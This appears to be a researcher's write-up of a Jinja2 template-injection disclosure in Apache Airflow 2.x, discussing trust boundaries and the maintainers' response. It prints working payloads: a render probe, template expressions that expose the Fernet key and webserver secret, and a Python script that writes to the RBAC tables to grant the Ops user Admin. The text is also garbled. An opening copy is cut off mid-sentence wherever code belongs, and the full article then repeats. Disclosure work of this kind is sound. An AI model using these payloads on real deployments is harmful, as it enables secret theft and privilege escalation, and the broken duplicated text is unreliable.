TL;DR: I reported what started as a pretty clean Jinja2 SSTI in Airflow, and it turned into a much more interesting argument about trust boundaries, product intent, and what a security model is actually supposed to mean. The exploit chain was real. The disagreement was about whether that chain violated the model, or just exposed exactly how much trust the model already assumes.
This one stopped being "just an injection bug" almost immediately.
I started with a simple pattern. A DAG reads an Airflow Variable at parse time, drops the returned string into
That looks boring. It is also exactly why it was interesting. The value returned by
The exploit itself was not theoretical.
I was able to confirm template evaluation first with the usual dumb probe:
That rendered to
That gave me the Fernet key and the webserver secret. No
Then it got more serious.
Once I had the database connection string available at render time, I used the worker's own environment to connect back to the metadata database and write directly to the RBAC tables. The core of it looked like this:
Before the attack,
This is where the disclosure got interesting, because Apache did not really disagree on the mechanics.
The real disagreement was about the model.
Airflow's security docs do a lot of work here. In the 2.x security model, Operations users are described as effectively near-admin, with the docs saying that apart from managing and granting permissions to other users, you should otherwise assume they have the same access as an admin. In the current stable docs for Airflow 3, that language is even more explicit, and audit logs are called out as admin-only too. The same docs also note that Airflow 3 masks more sensitive information and changes how access to sensitive data works.
That was basically Apache's position back to me. The DAG author is trusted. A DAG that treats untrusted Variable content as executable template input is bad DAG code. If that code hands an Ops user a dangerous capability, that is a deployment mistake and a misuse of Airflow, not an Airflow vulnerability.
And honestly, that is not a stupid argument.
But I still think the line is messier than that.
Airflow's own architecture docs talk about distributed deployments where the Operations user can trigger Dags and tasks but cannot author Dags. That is a real role boundary, not just a philosophical one. The best-practices docs also present top-level
That is the part I keep coming back to. Security models are not just lists of theoretical permissions. They are also contracts people build mental models around. If the docs tell people Ops cannot author Dags, and if the practical deployment pattern is "Ops tweaks Variables, DAG authors write code," then a chain that turns Variable write into worker-side capability escalation is worth treating like more than a docs footnote.
Airflow 3 is the strongest argument in Apache's favor, and weirdly also the strongest argument in mine.
The Airflow 3 upgrade docs are very blunt about the architectural change. In Airflow 2.x, all components talked directly to the metadata database, workers executed user code, and user code could perform malicious actions on that database. In Airflow 3.x, the API server becomes the sole access point for the metadata DB for tasks and workers, and direct metadata DB access from task code is restricted as a security improvement.
That matters because it explains why my chain worked so cleanly on 2.9.x. It also shows that Apache already saw this whole area as worth hardening. So yes, they are right that newer Airflow versions move the architecture in a better direction. But that also makes it hard to say the old behavior was purely theoretical or irrelevant. If you redesign the platform specifically to stop task code from talking straight to the metadata DB, you are acknowledging that this boundary matters.
There is also a precedent problem.
Airflow has already had a BashOperator injection issue treated as a real vulnerability. CVE-2022-24288 covered example DAGs that passed user-controlled params into
That does not automatically make every similar chain a CVE. But it does make the "this is just bad user code" answer feel a bit too convenient.
So, was it a vulnerability or not?
My answer is still "yes, but with context."
If you read Airflow 2.x as saying Ops is basically admin already, then Apache's response is internally consistent. In that framing, I did not break the model. I just demonstrated an unpleasant consequence of it.
If you read the model the way many operators will read it, which is "Ops can manage operations, DAG authors write code, and those are different trust levels," then this absolutely feels like a vulnerability. I was able to take Variable write, flow into a templated execution context, reach the metadata database, grant Admin, and cross the exact boundaries the docs describe as admin-only.
That is why this case was interesting. The exploit was the easy part. The hard part was deciding what promise Airflow was actually making.
And for the record, I do not think the maintainer response was unreasonable.
Direct, yes. Opinionated, definitely. But the core point was fair: security is not a binary sticker you slap on a product. A lot of it is risk allocation, trust assumptions, and being honest about what the platform does and does not try to protect you from. I do not agree with every conclusion there, but I do think that part is true.
My take now is pretty simple.
On Airflow 2.x, feeding
And that is probably the cleanest lesson from the whole incident. Sometimes the exploit proves a bug. Sometimes it proves the model is looser than people thought. Sometimes it proves both.
This one stopped being "just an injection bug" almost immediately.
I started with a simple pattern. A DAG reads an Airflow Variable at parse time, drops the returned string into
BashOperator.bash_command, and lets templating do the rest.
Code:
from airflow.models import Variable
from airflow.operators.bash import BashOperator
deploy_cmd = Variable.get("deploy_command", default_var="echo hello")
with DAG("deploy_pipeline", ...) as dag:
BashOperator(task_id="run", bash_command=deploy_cmd)
That looks boring. It is also exactly why it was interesting. The value returned by
Variable.get() becomes the Jinja template string for a templated field, so if an Ops user can edit that Variable, they can feed Jinja straight into worker-side rendering. Airflow's best-practices docs already warn against top-level Variable.get(), but mainly from a performance and parsing perspective. They also show deferring Variable access through Jinja templates, which is fine operationally, but not the same thing as saying "this is safe if lower-privileged users control the value."The exploit itself was not theoretical.
I was able to confirm template evaluation first with the usual dumb probe:
Code:
echo SSTI_PROBE={{ 7 * 7 }}
That rendered to
49 on the worker. After that, the useful part was not some flashy sandbox escape. I did not need one. The Jinja context already had what mattered. Normal access to conf, var, and conn was enough. So the next payload was just secret exfiltration:
Code:
echo SSTI_FERNET={{ conf.get('core', 'fernet_key') }}
&& echo SSTI_SECRET={{ conf.get('webserver', 'secret_key') }}
That gave me the Fernet key and the webserver secret. No
globals games. No cute sandbox bypasses. Just the runtime context doing exactly what it was designed to do, in the wrong trust boundary.Then it got more serious.
Once I had the database connection string available at render time, I used the worker's own environment to connect back to the metadata database and write directly to the RBAC tables. The core of it looked like this:
Code:
export DB="{{ conf.get('database', 'sql_alchemy_conn')
| replace('postgresql+psycopg2://', 'postgresql://') }}"
&& python3 << 'PY'
import psycopg2, os
conn = psycopg2.connect(os.environ["DB"])
cur = conn.cursor()
cur.execute("SELECT id FROM ab_role WHERE name='Admin'")
admin_rid = cur.fetchone()[0]
cur.execute("SELECT id FROM ab_user WHERE username='opsuser'")
ops_uid = cur.fetchone()[0]
cur.execute("INSERT INTO ab_user_role (user_id, role_id) VALUES (%s, %s)",
(ops_uid, admin_rid))
conn.commit()
PY
Before the attack,
/api/v1/users and /api/v1/eventLogs returned 403 for the Ops user. After the attack and a fresh login, they returned 200. That is the point where this stopped being an abstract "bad DAG code" discussion for me. I had a concrete Op-to-Admin path, plus direct access to audit-log data and password hashes.This is where the disclosure got interesting, because Apache did not really disagree on the mechanics.
The real disagreement was about the model.
Airflow's security docs do a lot of work here. In the 2.x security model, Operations users are described as effectively near-admin, with the docs saying that apart from managing and granting permissions to other users, you should otherwise assume they have the same access as an admin. In the current stable docs for Airflow 3, that language is even more explicit, and audit logs are called out as admin-only too. The same docs also note that Airflow 3 masks more sensitive information and changes how access to sensitive data works.
That was basically Apache's position back to me. The DAG author is trusted. A DAG that treats untrusted Variable content as executable template input is bad DAG code. If that code hands an Ops user a dangerous capability, that is a deployment mistake and a misuse of Airflow, not an Airflow vulnerability.
And honestly, that is not a stupid argument.
But I still think the line is messier than that.
Airflow's own architecture docs talk about distributed deployments where the Operations user can trigger Dags and tasks but cannot author Dags. That is a real role boundary, not just a philosophical one. The best-practices docs also present top-level
Variable.get() as something users do often enough that it needs explicit guidance, but the emphasis there is performance, not "by the way, if a lower-privileged user controls this Variable and it lands in a template field, you may have just handed them worker-side execution and a path into the metadata plane."That is the part I keep coming back to. Security models are not just lists of theoretical permissions. They are also contracts people build mental models around. If the docs tell people Ops cannot author Dags, and if the practical deployment pattern is "Ops tweaks Variables, DAG authors write code," then a chain that turns Variable write into worker-side capability escalation is worth treating like more than a docs footnote.
Airflow 3 is the strongest argument in Apache's favor, and weirdly also the strongest argument in mine.
The Airflow 3 upgrade docs are very blunt about the architectural change. In Airflow 2.x, all components talked directly to the metadata database, workers executed user code, and user code could perform malicious actions on that database. In Airflow 3.x, the API server becomes the sole access point for the metadata DB for tasks and workers, and direct metadata DB access from task code is restricted as a security improvement.
That matters because it explains why my chain worked so cleanly on 2.9.x. It also shows that Apache already saw this whole area as worth hardening. So yes, they are right that newer Airflow versions move the architecture in a better direction. But that also makes it hard to say the old behavior was purely theoretical or irrelevant. If you redesign the platform specifically to stop task code from talking straight to the metadata DB, you are acknowledging that this boundary matters.
There is also a precedent problem.
Airflow has already had a BashOperator injection issue treated as a real vulnerability. CVE-2022-24288 covered example DAGs that passed user-controlled params into
BashOperator without proper sanitization, and GitHub tracks that as a high-severity command injection issue in versions before 2.2.4. My chain was not identical, but it lived in the same neighborhood: user-controlled data reaching an execution sink through templating and composition choices people absolutely make in real DAGs.That does not automatically make every similar chain a CVE. But it does make the "this is just bad user code" answer feel a bit too convenient.
So, was it a vulnerability or not?
My answer is still "yes, but with context."
If you read Airflow 2.x as saying Ops is basically admin already, then Apache's response is internally consistent. In that framing, I did not break the model. I just demonstrated an unpleasant consequence of it.
If you read the model the way many operators will read it, which is "Ops can manage operations, DAG authors write code, and those are different trust levels," then this absolutely feels like a vulnerability. I was able to take Variable write, flow into a templated execution context, reach the metadata database, grant Admin, and cross the exact boundaries the docs describe as admin-only.
That is why this case was interesting. The exploit was the easy part. The hard part was deciding what promise Airflow was actually making.
And for the record, I do not think the maintainer response was unreasonable.
Direct, yes. Opinionated, definitely. But the core point was fair: security is not a binary sticker you slap on a product. A lot of it is risk allocation, trust assumptions, and being honest about what the platform does and does not try to protect you from. I do not agree with every conclusion there, but I do think that part is true.
My take now is pretty simple.
On Airflow 2.x, feeding
Variable.get() into a templated field like bash_command is more dangerous than it looks. Treat anyone who can edit those Variables as far more trusted than the UI role names might suggest. If you care about stronger separation between operations staff and execution power, Airflow 3 is not just a routine upgrade. It is a materially different security story.And that is probably the cleanest lesson from the whole incident. Sometimes the exploit proves a bug. Sometimes it proves the model is looser than people thought. Sometimes it proves both.